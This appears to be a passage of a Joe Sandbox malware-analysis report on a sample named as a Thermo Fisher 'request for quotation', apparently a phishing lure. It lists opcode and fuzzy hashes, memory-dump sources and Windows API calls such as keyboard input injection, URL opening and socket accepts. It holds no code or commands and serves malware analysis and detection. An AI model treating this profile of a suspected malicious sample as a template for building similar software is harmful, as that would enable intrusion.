                                                              • Opcode ID: daa31cb546c66ca6e837fc4cb3bc7276d7e480730b11dbf642080ac759df58a1
                                                              • Instruction ID: 28d26d77bae24fa0d4591b5dbb6e4c174385c81f50ac37fa4645ea32502c5a8d
                                                              • Opcode Fuzzy Hash: daa31cb546c66ca6e837fc4cb3bc7276d7e480730b11dbf642080ac759df58a1
                                                              • Instruction Fuzzy Hash: AAD0C7F0540762AFD7205F65E80C683BBF6AF15715B115519F495E2391FBB1D4C08F60
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fff21945be25e5fea7b6cdb4118b0816dc49f35c1f8632a31cb53263408647e2
                                                              • Instruction ID: f99745c9f8f662c5e492ce7e579c6713265a44610486afb1988d4e14c933d027
                                                              • Opcode Fuzzy Hash: fff21945be25e5fea7b6cdb4118b0816dc49f35c1f8632a31cb53263408647e2
                                                              • Instruction Fuzzy Hash: 3CC14D75A0021AEFDB14DF94C884AAEB7B6FF48704F144598E906EB291D7B0DE41DFA0
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0065AAB4
                                                              • CoUninitialize.OLE32 ref: 0065AABF
                                                                • Part of subcall function 00640213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0064027B
                                                              • VariantInit.OLEAUT32(?), ref: 0065AACA
                                                              • VariantClear.OLEAUT32(?), ref: 0065AD9D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: 028859b572185f21f41c4df125d0803d7eee29bd16797af586b1cdfef4030dae
                                                              • Instruction ID: da01b4f04771b90a462ace91499b4a6241716ec3fce76c35133fa418614b2c11
                                                              • Opcode Fuzzy Hash: 028859b572185f21f41c4df125d0803d7eee29bd16797af586b1cdfef4030dae
                                                              • Instruction Fuzzy Hash: 1EA18B352047019FCB54EF64C491B5AB7E6BF88311F04864DFA969B3A2CB30ED44CB9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: d66d62bf2bf59a0c3abdd4cb7225d7d7131b7e0d4c99c1c8e8b4343b657979f1
                                                              • Instruction ID: bbd54fd096d8456711586645daf9ae87793b880373b6d2cf83f52f7eb21f16af
                                                              • Opcode Fuzzy Hash: d66d62bf2bf59a0c3abdd4cb7225d7d7131b7e0d4c99c1c8e8b4343b657979f1
                                                              • Instruction Fuzzy Hash: 9451FA70A403029BEB64AF65D49166EB3E7EF45314F20981FE547C72D2DBB09881CFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                              • String ID:
                                                              • API String ID: 3877424927-0
                                                              • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction ID: 1cb0ebd518286dab78eba65dbc017c387d8608dc14688e719c841a6f83553ed5
                                                              • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                              • Instruction Fuzzy Hash: C251B8B0A00B35ABDF248F69A8845AE77A7AF40320F24862DF825963D0D7799F518F44
                                                              APIs
                                                              • GetWindowRect.USER32(00BB8C68,?), ref: 0066C544
                                                              • ScreenToClient.USER32(?,00000002), ref: 0066C574
                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0066C5DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: 8cdd801d794cd479bb72d0b38d3d7c4defced51891cdacb66a70d2713a78646f
                                                              • Instruction ID: 0f58e26ba5b4536bfbe5067a7efb88ade01b831144ac58701a681afe6a2e03e7
                                                              • Opcode Fuzzy Hash: 8cdd801d794cd479bb72d0b38d3d7c4defced51891cdacb66a70d2713a78646f
                                                              • Instruction Fuzzy Hash: 7A513B75A00608AFCF10DF68C880ABE7BB6EB55320F108659F9A5DB291D770ED91CB90
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0063C462
                                                              • __itow.LIBCMT ref: 0063C49C
                                                                • Part of subcall function 0063C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0063C753
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0063C505
                                                              • __itow.LIBCMT ref: 0063C55A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 8fe8290fada21f1988d30f43e5db888bbbdfa5bb8cf3ae4935454eb574c6edef
                                                              • Instruction ID: e7ebfc4729699a4e99e58d7960112594709569451c26480a9ec1795a2fa4ab3d
                                                              • Opcode Fuzzy Hash: 8fe8290fada21f1988d30f43e5db888bbbdfa5bb8cf3ae4935454eb574c6edef
                                                              • Instruction Fuzzy Hash: B2419371600208ABDF25DF54C852BEF7BB6AF49720F000059FA05B7282DB709A558BE5
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00643966
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00643982
                                                              • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006439EF
                                                              • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00643A4D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: ae09777ea7d51e7c184f24d74d50b9370f3dad9d9847a2b60d775ea7e0514c4a
                                                              • Instruction ID: 7e1643a86980ca8335e9ada9213900d35f4f4bfb63119df64b4551345047bce8
                                                              • Opcode Fuzzy Hash: ae09777ea7d51e7c184f24d74d50b9370f3dad9d9847a2b60d775ea7e0514c4a
                                                              • Instruction Fuzzy Hash: 60412670E44268AEEF208B64C816BFDBBBBAF55310F14021AF4C1963C1DBB48E85D765
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0064E742
                                                              • GetLastError.KERNEL32(?,00000000), ref: 0064E768
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0064E78D
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0064E7B9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: 4f5f1545db8ce6a709669825620824235923d56001eccda19c913e3ebf3e66a7
                                                              • Instruction ID: 988a1f9c9145fc8e1fe63fc8d283e730cb0650cb4252e4e8178edc38ccf6df25
                                                              • Opcode Fuzzy Hash: 4f5f1545db8ce6a709669825620824235923d56001eccda19c913e3ebf3e66a7
                                                              • Instruction Fuzzy Hash: DB411739600610DFCF15EF55C44494EBBE7BF59720B098498E986AB3A2CB71FD40CB95
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0066B5D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 210fe0a57639488e76acc86665875841ff3542a30e6d6df54ae9838d7e15f083
                                                              • Instruction ID: 81c21b992a565c664d557875283b304784f54ee9f220982a228b8e04df0e9a0f
                                                              • Opcode Fuzzy Hash: 210fe0a57639488e76acc86665875841ff3542a30e6d6df54ae9838d7e15f083
                                                              • Instruction Fuzzy Hash: 7E31CE74641208FFEF248F19CC89FE87767EB06310F646215FA52D62E2D770A9C08B56
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 0066D807
                                                              • GetWindowRect.USER32(?,?), ref: 0066D87D
                                                              • PtInRect.USER32(?,?,0066ED5A), ref: 0066D88D
                                                              • MessageBeep.USER32(00000000), ref: 0066D8FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 872bf5ff81de83ae8f3c96a22a2ac3c2ed5974ffe731d8be46e4d1dd0ee184ae
                                                              • Instruction ID: 827e8c0796dde1367c8f241cdc328b7fe4c56f51a062b7064a0eac1d19051853
                                                              • Opcode Fuzzy Hash: 872bf5ff81de83ae8f3c96a22a2ac3c2ed5974ffe731d8be46e4d1dd0ee184ae
                                                              • Instruction Fuzzy Hash: C2415C74F00219EFCB11DF59D888EA97BB6FB46354F1882AEE4149B291D730E945CB50
                                                              APIs
                                                              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00643AB8
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00643AD4
                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00643B34
                                                              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00643B92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: c77dbcff9105b79096ab7ff5dcc8f98e0da2324b300aea85de3bccaa88f919fc
                                                              • Instruction ID: e0fdaa30caea6966ca8b7fe18f435fdc9c1d12213df4f32fb568d3fefaca8658
                                                              • Opcode Fuzzy Hash: c77dbcff9105b79096ab7ff5dcc8f98e0da2324b300aea85de3bccaa88f919fc
                                                              • Instruction Fuzzy Hash: 5D31E430A00268AEEF219B64C819BFE7BA7DB65310F04025AE481933D1C7748B85D765
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00634038
                                                              • __isleadbyte_l.LIBCMT ref: 00634066
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00634094
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006340CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 1f7b65bcc8b99a1e8c78d614b6cd8c641e94863cfac92d83ded0e32c77ee793e
                                                              • Instruction ID: 5785567a709e382c4559001e5d6474854cd37ee403656c40f91beb80d99f3636
                                                              • Opcode Fuzzy Hash: 1f7b65bcc8b99a1e8c78d614b6cd8c641e94863cfac92d83ded0e32c77ee793e
                                                              • Instruction Fuzzy Hash: B131D230704616AFDB259F34C844BAABBB7FF41310F154028E6618B2A1EB31E891DBD0
                                                              APIs
                                                              • GetForegroundWindow.USER32 ref: 00667CB9
                                                                • Part of subcall function 00645F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00645F6F
                                                                • Part of subcall function 00645F55: GetCurrentThreadId.KERNEL32 ref: 00645F76
                                                                • Part of subcall function 00645F55: AttachThreadInput.USER32(00000000,?,0064781F), ref: 00645F7D
                                                              • GetCaretPos.USER32(?), ref: 00667CCA
                                                              • ClientToScreen.USER32(00000000,?), ref: 00667D03
                                                              • GetForegroundWindow.USER32 ref: 00667D09
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                              • String ID:
                                                              • API String ID: 2759813231-0
                                                              • Opcode ID: f0e30b13fe73cfc53d3b688a2010cb09225c9588d3d041ea0da54598951bcc54
                                                              • Instruction ID: 7e7aa0ee44f0cdf6b7a1a4af468cf8169cf57e6c51861f68768af3aded1a19ad
                                                              • Opcode Fuzzy Hash: f0e30b13fe73cfc53d3b688a2010cb09225c9588d3d041ea0da54598951bcc54
                                                              • Instruction Fuzzy Hash: 0A312F71900108AFDB40EFB9C8459EFBBFEEF58314B10946AE815E3211DA319E45CFA4
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • GetCursorPos.USER32(?), ref: 0066F211
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0067E4C0,?,?,?,?,?), ref: 0066F226
                                                              • GetCursorPos.USER32(?), ref: 0066F270
                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0067E4C0,?,?,?), ref: 0066F2A6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                              • String ID:
                                                              • API String ID: 2864067406-0
                                                              • Opcode ID: 2aa3e750d9cb0c4a5eac5d10810657f42f01d0b2949df6a66acbb5ccd48275b2
                                                              • Instruction ID: 062b8adab1a11c92ec6e0cf154578960a38416e7eff6f737d49999d891215894
                                                              • Opcode Fuzzy Hash: 2aa3e750d9cb0c4a5eac5d10810657f42f01d0b2949df6a66acbb5ccd48275b2
                                                              • Instruction Fuzzy Hash: EB218079500018AFCB158F95E868EFE7BBBEF0A710F044169F9055B2A2D7319A51DF60
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00654358
                                                                • Part of subcall function 006543E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00654401
                                                                • Part of subcall function 006543E2: InternetCloseHandle.WININET(00000000), ref: 0065449E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseConnectHandleOpen
                                                              • String ID:
                                                              • API String ID: 1463438336-0
                                                              • Opcode ID: 0c0f4229f935ea30396fe81744f95d9e662b4f353eb2ba59d2b8815b223d13bd
                                                              • Instruction ID: 67b4ad021216b23d9e48f1e6c10b405fd16620de0e4854d7d84c724d3ee0192d
                                                              • Opcode Fuzzy Hash: 0c0f4229f935ea30396fe81744f95d9e662b4f353eb2ba59d2b8815b223d13bd
                                                              • Instruction Fuzzy Hash: FA21D131200601BBEB119F61DC00FBBB7ABFF4471AF00411EBE15976A0DF71986997A4
                                                              APIs
                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00658AE0
                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00658AF2
                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00658AFF
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00658B16
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastacceptselect
                                                              • String ID:
                                                              • API String ID: 385091864-0
                                                              • Opcode ID: 4e4aa3cb0c85f08693196376ca357a712b6570528ba817ff11d9c087f6a07e58
                                                              • Instruction ID: 8990a9a8faf3d9741ed4a24a59c91c26f55647178e77d80f5eda434010929de3
                                                              • Opcode Fuzzy Hash: 4e4aa3cb0c85f08693196376ca357a712b6570528ba817ff11d9c087f6a07e58
                                                              • Instruction Fuzzy Hash: 4A219372A00124AFC7519F68C885ADEBBEDEF49310F00426AF849E7290DB749A458FA4
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00668AA6
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00668AC0
                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00668ACE
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00668ADC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
